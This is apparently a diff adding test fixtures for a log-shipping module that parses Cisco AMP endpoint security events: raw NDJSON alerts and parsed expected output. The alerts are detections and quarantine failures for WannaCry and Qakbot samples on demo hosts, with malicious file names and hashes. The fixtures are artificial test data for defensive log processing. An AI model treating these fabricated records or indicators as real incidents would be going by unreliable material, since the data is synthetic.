+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json new file mode 100644 index 00000000000..a8bcab1df6e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json 
@@ -0,0 +1,3114 @@ +[ + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847664", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847663", + "cisco.amp.error.description": "Delete pending", + 
"cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1193, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847662", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2379, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847661", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 3572, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": 
"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847659", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 4765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847657", + "cisco.amp.error.description": 
"Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 5950, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814973", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + 
"file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 120000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": 